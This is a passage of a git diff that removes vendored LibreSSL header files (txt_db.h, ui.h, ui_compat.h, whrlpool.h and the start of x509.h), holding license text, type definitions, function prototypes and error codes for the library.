- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_TXT_DB_H
-#define HEADER_TXT_DB_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/stack.h>
-#include <openssl/lhash.h>
-
-#define DB_ERROR_OK			0
-#define DB_ERROR_MALLOC			1
-#define DB_ERROR_INDEX_CLASH    	2
-#define DB_ERROR_INDEX_OUT_OF_RANGE	3
-#define DB_ERROR_NO_INDEX		4
-#define DB_ERROR_INSERT_INDEX_CLASH    	5
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef OPENSSL_STRING *OPENSSL_PSTRING;
-DECLARE_SPECIAL_STACK_OF(OPENSSL_PSTRING, OPENSSL_STRING)
-
-typedef struct txt_db_st {
-	int num_fields;
-	STACK_OF(OPENSSL_PSTRING) *data;
-	LHASH_OF(OPENSSL_STRING) **index;
-	int (**qual)(OPENSSL_STRING *);
-	long error;
-	long arg1;
-	long arg2;
-	OPENSSL_STRING *arg_row;
-} TXT_DB;
-
-#ifndef OPENSSL_NO_BIO
-TXT_DB *TXT_DB_read(BIO *in, int num);
-long TXT_DB_write(BIO *out, TXT_DB *db);
-#else
-TXT_DB *TXT_DB_read(char *in, int num);
-long TXT_DB_write(char *out, TXT_DB *db);
-#endif
-int TXT_DB_create_index(TXT_DB *db, int field, int (*qual)(OPENSSL_STRING *),
-    LHASH_HASH_FN_TYPE hash, LHASH_COMP_FN_TYPE cmp);
-void TXT_DB_free(TXT_DB *db);
-OPENSSL_STRING *TXT_DB_get_by_index(TXT_DB *db, int idx, OPENSSL_STRING *value);
-int TXT_DB_insert(TXT_DB *db, OPENSSL_STRING *value);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/ui.h b/thirdparty/libressl/include/openssl/ui.h
deleted file mode 100644
index b6b0075..0000000
--- a/thirdparty/libressl/include/openssl/ui.h
+++ /dev/null
@@ -1,384 +0,0 @@
-/* $OpenBSD: ui.h,v 1.9 2014/07/10 22:45:58 jsing Exp $ */
-/* Written by Richard Levitte (richard@levitte.org) for the OpenSSL
- * project 2001.
- */
-/* ====================================================================
- * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_UI_H
-#define HEADER_UI_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/crypto.h>
-#endif
-#include <openssl/safestack.h>
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Declared already in ossl_typ.h */
-/* typedef struct ui_st UI; */
-/* typedef struct ui_method_st UI_METHOD; */
-
-
-/* All the following functions return -1 or NULL on error and in some cases
-   (UI_process()) -2 if interrupted or in some other way cancelled.
-   When everything is fine, they return 0, a positive value or a non-NULL
-   pointer, all depending on their purpose. */
-
-/* Creators and destructor.   */
-UI *UI_new(void);
-UI *UI_new_method(const UI_METHOD *method);
-void UI_free(UI *ui);
-
-/* The following functions are used to add strings to be printed and prompt
-   strings to prompt for data.  The names are UI_{add,dup}_<function>_string
-   and UI_{add,dup}_input_boolean.
-
-   UI_{add,dup}_<function>_string have the following meanings:
-	add	add a text or prompt string.  The pointers given to these
-		functions are used verbatim, no copying is done.
-	dup	make a copy of the text or prompt string, then add the copy
-		to the collection of strings in the user interface.
-	<function>
-		The function is a name for the functionality that the given
-		string shall be used for.  It can be one of:
-			input	use the string as data prompt.
-			verify	use the string as verification prompt.  This
-				is used to verify a previous input.
-			info	use the string for informational output.
-			error	use the string for error output.
-   Honestly, there's currently no difference between info and error for the
-   moment.
-
-   UI_{add,dup}_input_boolean have the same semantics for "add" and "dup",
-   and are typically used when one wants to prompt for a yes/no response.
-
-
-   All of the functions in this group take a UI and a prompt string.
-   The string input and verify addition functions also take a flag argument,
-   a buffer for the result to end up with, a minimum input size and a maximum
-   input size (the result buffer MUST be large enough to be able to contain
-   the maximum number of characters).  Additionally, the verify addition
-   functions takes another buffer to compare the result against.
-   The boolean input functions take an action description string (which should
-   be safe to ignore if the expected user action is obvious, for example with
-   a dialog box with an OK button and a Cancel button), a string of acceptable
-   characters to mean OK and to mean Cancel.  The two last strings are checked
-   to make sure they don't have common characters.  Additionally, the same
-   flag argument as for the string input is taken, as well as a result buffer.
-   The result buffer is required to be at least one byte long.  Depending on
-   the answer, the first character from the OK or the Cancel character strings
-   will be stored in the first byte of the result buffer.  No NUL will be
-   added, so the result is *not* a string.
-
-   On success, the all return an index of the added information.  That index
-   is usefull when retrieving results with UI_get0_result(). */
-int UI_add_input_string(UI *ui, const char *prompt, int flags,
-    char *result_buf, int minsize, int maxsize);
-int UI_dup_input_string(UI *ui, const char *prompt, int flags,
-    char *result_buf, int minsize, int maxsize);
-int UI_add_verify_string(UI *ui, const char *prompt, int flags,
-    char *result_buf, int minsize, int maxsize, const char *test_buf);
-int UI_dup_verify_string(UI *ui, const char *prompt, int flags,
-    char *result_buf, int minsize, int maxsize, const char *test_buf);
-int UI_add_input_boolean(UI *ui, const char *prompt, const char *action_desc,
-    const char *ok_chars, const char *cancel_chars,
-    int flags, char *result_buf);
-int UI_dup_input_boolean(UI *ui, const char *prompt, const char *action_desc,
-    const char *ok_chars, const char *cancel_chars,
-    int flags, char *result_buf);
-int UI_add_info_string(UI *ui, const char *text);
-int UI_dup_info_string(UI *ui, const char *text);
-int UI_add_error_string(UI *ui, const char *text);
-int UI_dup_error_string(UI *ui, const char *text);
-
-/* These are the possible flags.  They can be or'ed together. */
-/* Use to have echoing of input */
-#define UI_INPUT_FLAG_ECHO		0x01
-/* Use a default password.  Where that password is found is completely
-   up to the application, it might for example be in the user data set
-   with UI_add_user_data().  It is not recommended to have more than
-   one input in each UI being marked with this flag, or the application
-   might get confused. */
-#define UI_INPUT_FLAG_DEFAULT_PWD	0x02
-
-/* The user of these routines may want to define flags of their own.  The core
-   UI won't look at those, but will pass them on to the method routines.  They
-   must use higher bits so they don't get confused with the UI bits above.
-   UI_INPUT_FLAG_USER_BASE tells which is the lowest bit to use.  A good
-   example of use is this:
-
-	#define MY_UI_FLAG1	(0x01 << UI_INPUT_FLAG_USER_BASE)
-
-*/
-#define UI_INPUT_FLAG_USER_BASE	16
-
-
-/* The following function helps construct a prompt.  object_desc is a
-   textual short description of the object, for example "pass phrase",
-   and object_name is the name of the object (might be a card name or
-   a file name.
-   The returned string shall always be allocated on the heap with
-   malloc(), and need to be free'd with free().
-
-   If the ui_method doesn't contain a pointer to a user-defined prompt
-   constructor, a default string is built, looking like this:
-
-	"Enter {object_desc} for {object_name}:"
-
-   So, if object_desc has the value "pass phrase" and object_name has
-   the value "foo.key", the resulting string is:
-
-	"Enter pass phrase for foo.key:"
-*/
-char *UI_construct_prompt(UI *ui_method, const char *object_desc,
-    const char *object_name);
-
-
-/* The following function is used to store a pointer to user-specific data.
-   Any previous such pointer will be returned and replaced.
-
-   For callback purposes, this function makes a lot more sense than using
-   ex_data, since the latter requires that different parts of OpenSSL or
-   applications share the same ex_data index.
-
-   Note that the UI_OpenSSL() method completely ignores the user data.
-   Other methods may not, however.  */
-void *UI_add_user_data(UI *ui, void *user_data);
-/* We need a user data retrieving function as well.  */
-void *UI_get0_user_data(UI *ui);
-
-/* Return the result associated with a prompt given with the index i. */
-const char *UI_get0_result(UI *ui, int i);
-
-/* When all strings have been added, process the whole thing. */
-int UI_process(UI *ui);
-
-/* Give a user interface parametrised control commands.  This can be used to
-   send down an integer, a data pointer or a function pointer, as well as
-   be used to get information from a UI. */
-int UI_ctrl(UI *ui, int cmd, long i, void *p, void (*f)(void));
-
-/* The commands */
-/* Use UI_CONTROL_PRINT_ERRORS with the value 1 to have UI_process print the
-   OpenSSL error stack before printing any info or added error messages and
-   before any prompting. */
-#define UI_CTRL_PRINT_ERRORS		1
-/* Check if a UI_process() is possible to do again with the same instance of
-   a user interface.  This makes UI_ctrl() return 1 if it is redoable, and 0
-   if not. */
-#define UI_CTRL_IS_REDOABLE		2
-
-
-/* Some methods may use extra data */
-#define UI_set_app_data(s,arg)         UI_set_ex_data(s,0,arg)
-#define UI_get_app_data(s)             UI_get_ex_data(s,0)
-int UI_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int UI_set_ex_data(UI *r, int idx, void *arg);
-void *UI_get_ex_data(UI *r, int idx);
-
-/* Use specific methods instead of the built-in one */
-void UI_set_default_method(const UI_METHOD *meth);
-const UI_METHOD *UI_get_default_method(void);
-const UI_METHOD *UI_get_method(UI *ui);
-const UI_METHOD *UI_set_method(UI *ui, const UI_METHOD *meth);
-
-/* The method with all the built-in thingies */
-UI_METHOD *UI_OpenSSL(void);
-
-
-/* ---------- For method writers ---------- */
-/* A method contains a number of functions that implement the low level
-   of the User Interface.  The functions are:
-
-	an opener	This function starts a session, maybe by opening
-			a channel to a tty, or by opening a window.
-	a writer	This function is called to write a given string,
-			maybe to the tty, maybe as a field label in a
-			window.
-	a flusher	This function is called to flush everything that
-			has been output so far.  It can be used to actually
-			display a dialog box after it has been built.
-	a reader	This function is called to read a given prompt,
-			maybe from the tty, maybe from a field in a
-			window.  Note that it's called wth all string
-			structures, not only the prompt ones, so it must
-			check such things itself.
-	a closer	This function closes the session, maybe by closing
-			the channel to the tty, or closing the window.
-
-   All these functions are expected to return:
-
-	0	on error.
-	1	on success.
-	-1	on out-of-band events, for example if some prompting has
-		been canceled (by pressing Ctrl-C, for example).  This is
-		only checked when returned by the flusher or the reader.
-
-   The way this is used, the opener is first called, then the writer for all
-   strings, then the flusher, then the reader for all strings and finally the
-   closer.  Note that if you want to prompt from a terminal or other command
-   line interface, the best is to have the reader also write the prompts
-   instead of having the writer do it.  If you want to prompt from a dialog
-   box, the writer can be used to build up the contents of the box, and the
-   flusher to actually display the box and run the event loop until all data
-   has been given, after which the reader only grabs the given data and puts
-   them back into the UI strings.
-
-   All method functions take a UI as argument.  Additionally, the writer and
-   the reader take a UI_STRING.
-*/
-
-/* The UI_STRING type is the data structure that contains all the needed info
-   about a string or a prompt, including test data for a verification prompt.
-*/
-typedef struct ui_string_st UI_STRING;
-DECLARE_STACK_OF(UI_STRING)
-
-/* The different types of strings that are currently supported.
-   This is only needed by method authors. */
-enum UI_string_types {
-	UIT_NONE = 0,
-	UIT_PROMPT,		/* Prompt for a string */
-	UIT_VERIFY,		/* Prompt for a string and verify */
-	UIT_BOOLEAN,		/* Prompt for a yes/no response */
-	UIT_INFO,		/* Send info to the user */
-	UIT_ERROR		/* Send an error message to the user */
-};
-
-/* Create and manipulate methods */
-UI_METHOD *UI_create_method(char *name);
-void UI_destroy_method(UI_METHOD *ui_method);
-int UI_method_set_opener(UI_METHOD *method, int (*opener)(UI *ui));
-int UI_method_set_writer(UI_METHOD *method, int (*writer)(UI *ui, UI_STRING *uis));
-int UI_method_set_flusher(UI_METHOD *method, int (*flusher)(UI *ui));
-int UI_method_set_reader(UI_METHOD *method, int (*reader)(UI *ui, UI_STRING *uis));
-int UI_method_set_closer(UI_METHOD *method, int (*closer)(UI *ui));
-int UI_method_set_prompt_constructor(UI_METHOD *method, char *(*prompt_constructor)(UI* ui, const char* object_desc, const char* object_name));
-int (*UI_method_get_opener(UI_METHOD *method))(UI*);
-int (*UI_method_get_writer(UI_METHOD *method))(UI*, UI_STRING*);
-int (*UI_method_get_flusher(UI_METHOD *method))(UI*);
-int (*UI_method_get_reader(UI_METHOD *method))(UI*, UI_STRING*);
-int (*UI_method_get_closer(UI_METHOD *method))(UI*);
-char * (*UI_method_get_prompt_constructor(UI_METHOD *method))(UI*, const char*, const char*);
-
-/* The following functions are helpers for method writers to access relevant
-   data from a UI_STRING. */
-
-/* Return type of the UI_STRING */
-enum UI_string_types UI_get_string_type(UI_STRING *uis);
-/* Return input flags of the UI_STRING */
-int UI_get_input_flags(UI_STRING *uis);
-/* Return the actual string to output (the prompt, info or error) */
-const char *UI_get0_output_string(UI_STRING *uis);
-/* Return the optional action string to output (the boolean promtp instruction) */
-const char *UI_get0_action_string(UI_STRING *uis);
-/* Return the result of a prompt */
-const char *UI_get0_result_string(UI_STRING *uis);
-/* Return the string to test the result against.  Only useful with verifies. */
-const char *UI_get0_test_string(UI_STRING *uis);
-/* Return the required minimum size of the result */
-int UI_get_result_minsize(UI_STRING *uis);
-/* Return the required maximum size of the result */
-int UI_get_result_maxsize(UI_STRING *uis);
-/* Set the result of a UI_STRING. */
-int UI_set_result(UI *ui, UI_STRING *uis, const char *result);
-
-
-/* A couple of popular utility functions */
-int UI_UTIL_read_pw_string(char *buf, int length, const char *prompt, int verify);
-int UI_UTIL_read_pw(char *buf, char *buff, int size, const char *prompt, int verify);
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_UI_strings(void);
-
-/* Error codes for the UI functions. */
-
-/* Function codes. */
-#define UI_F_GENERAL_ALLOCATE_BOOLEAN			 108
-#define UI_F_GENERAL_ALLOCATE_PROMPT			 109
-#define UI_F_GENERAL_ALLOCATE_STRING			 100
-#define UI_F_UI_CTRL					 111
-#define UI_F_UI_DUP_ERROR_STRING			 101
-#define UI_F_UI_DUP_INFO_STRING				 102
-#define UI_F_UI_DUP_INPUT_BOOLEAN			 110
-#define UI_F_UI_DUP_INPUT_STRING			 103
-#define UI_F_UI_DUP_VERIFY_STRING			 106
-#define UI_F_UI_GET0_RESULT				 107
-#define UI_F_UI_NEW_METHOD				 104
-#define UI_F_UI_SET_RESULT				 105
-
-/* Reason codes. */
-#define UI_R_COMMON_OK_AND_CANCEL_CHARACTERS		 104
-#define UI_R_INDEX_TOO_LARGE				 102
-#define UI_R_INDEX_TOO_SMALL				 103
-#define UI_R_NO_RESULT_BUFFER				 105
-#define UI_R_RESULT_TOO_LARGE				 100
-#define UI_R_RESULT_TOO_SMALL				 101
-#define UI_R_UNKNOWN_CONTROL_COMMAND			 106
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ui_compat.h b/thirdparty/libressl/include/openssl/ui_compat.h
deleted file mode 100644
index 860e80c..0000000
--- a/thirdparty/libressl/include/openssl/ui_compat.h
+++ /dev/null
@@ -1,83 +0,0 @@
-/* $OpenBSD: ui_compat.h,v 1.4 2014/06/12 15:49:31 deraadt Exp $ */
-/* Written by Richard Levitte (richard@levitte.org) for the OpenSSL
- * project 2001.
- */
-/* ====================================================================
- * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_UI_COMPAT_H
-#define HEADER_UI_COMPAT_H
-
-#include <openssl/opensslconf.h>
-#include <openssl/ui.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* The following functions were previously part of the DES section,
-   and are provided here for backward compatibility reasons. */
-
-#define des_read_pw_string(b,l,p,v) \
-	_ossl_old_des_read_pw_string((b),(l),(p),(v))
-#define des_read_pw(b,bf,s,p,v) \
-	_ossl_old_des_read_pw((b),(bf),(s),(p),(v))
-
-int _ossl_old_des_read_pw_string(char *buf, int length, const char *prompt, int verify);
-int _ossl_old_des_read_pw(char *buf, char *buff, int size, const char *prompt, int verify);
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/whrlpool.h b/thirdparty/libressl/include/openssl/whrlpool.h
deleted file mode 100644
index 875d34f..0000000
--- a/thirdparty/libressl/include/openssl/whrlpool.h
+++ /dev/null
@@ -1,41 +0,0 @@
-/* $OpenBSD: whrlpool.h,v 1.5 2014/07/10 22:45:58 jsing Exp $ */
-
-#include <stddef.h>
-
-#ifndef HEADER_WHRLPOOL_H
-#define HEADER_WHRLPOOL_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#define WHIRLPOOL_DIGEST_LENGTH	(512/8)
-#define WHIRLPOOL_BBLOCK	512
-#define WHIRLPOOL_COUNTER	(256/8)
-
-typedef struct	{
-	union	{
-		unsigned char	c[WHIRLPOOL_DIGEST_LENGTH];
-		/* double q is here to ensure 64-bit alignment */
-		double		q[WHIRLPOOL_DIGEST_LENGTH/sizeof(double)];
-		}	H;
-	unsigned char	data[WHIRLPOOL_BBLOCK/8];
-	unsigned int	bitoff;
-	size_t		bitlen[WHIRLPOOL_COUNTER/sizeof(size_t)];
-	} WHIRLPOOL_CTX;
-
-#ifndef OPENSSL_NO_WHIRLPOOL
-int WHIRLPOOL_Init	(WHIRLPOOL_CTX *c);
-int WHIRLPOOL_Update	(WHIRLPOOL_CTX *c,const void *inp,size_t bytes);
-void WHIRLPOOL_BitUpdate(WHIRLPOOL_CTX *c,const void *inp,size_t bits);
-int WHIRLPOOL_Final	(unsigned char *md,WHIRLPOOL_CTX *c);
-unsigned char *WHIRLPOOL(const void *inp,size_t bytes,unsigned char *md);
-#endif
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/x509.h b/thirdparty/libressl/include/openssl/x509.h
deleted file mode 100644
index 2949325..0000000
--- a/thirdparty/libressl/include/openssl/x509.h
+++ /dev/null
@@ -1,1378 +0,0 @@
-/* $OpenBSD: x509.h,v 1.26 2016/12/27 16:05:57 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- * ECDH support in OpenSSL originally developed by 
- * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
- */
-
-#ifndef HEADER_X509_H
-#define HEADER_X509_H
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_BUFFER
-#include <openssl/buffer.h>
-#endif
-#ifndef OPENSSL_NO_EVP
-#include <openssl/evp.h>
-#endif
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/stack.h>
-#include <openssl/asn1.h>
-#include <openssl/safestack.h>
-
-#ifndef OPENSSL_NO_EC
-#include <openssl/ec.h>
-#endif
-
-#ifndef OPENSSL_NO_ECDSA
-#include <openssl/ecdsa.h>
-#endif
-
-#ifndef OPENSSL_NO_ECDH
-#include <openssl/ecdh.h>
-#endif
-
-#ifndef OPENSSL_NO_DEPRECATED
-#ifndef OPENSSL_NO_RSA
-#include <openssl/rsa.h>
-#endif
-#ifndef OPENSSL_NO_DSA
-#include <openssl/dsa.h>
-#endif
-#ifndef OPENSSL_NO_DH
-#include <openssl/dh.h>
-#endif
-#endif
-
-#ifndef OPENSSL_NO_SHA
-#include <openssl/sha.h>
-#endif
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#if defined(_WIN32)
-#ifndef LIBRESSL_INTERNAL
-#ifdef _MSC_VER
-#pragma message("Warning, overriding WinCrypt defines")
-#else
-#warning overriding WinCrypt defines
-#endif
-#endif
-#undef X509_NAME
-#undef X509_CERT_PAIR
-#undef X509_EXTENSIONS
-#endif
-
-#define X509_FILETYPE_PEM	1
-#define X509_FILETYPE_ASN1	2
-#define X509_FILETYPE_DEFAULT	3
-
-#define X509v3_KU_DIGITAL_SIGNATURE	0x0080
-#define X509v3_KU_NON_REPUDIATION	0x0040
-#define X509v3_KU_KEY_ENCIPHERMENT	0x0020
-#define X509v3_KU_DATA_ENCIPHERMENT	0x0010
-#define X509v3_KU_KEY_AGREEMENT		0x0008
-#define X509v3_KU_KEY_CERT_SIGN		0x0004
-#define X509v3_KU_CRL_SIGN		0x0002
-#define X509v3_KU_ENCIPHER_ONLY		0x0001
-#define X509v3_KU_DECIPHER_ONLY		0x8000
-#define X509v3_KU_UNDEF			0xffff
-
-typedef struct X509_objects_st
-	{
-	int nid;
-	int (*a2i)(void);
-	int (*i2a)(void);
-	} X509_OBJECTS;
-
-struct X509_algor_st
-	{
-	ASN1_OBJECT *algorithm;
-	ASN1_TYPE *parameter;
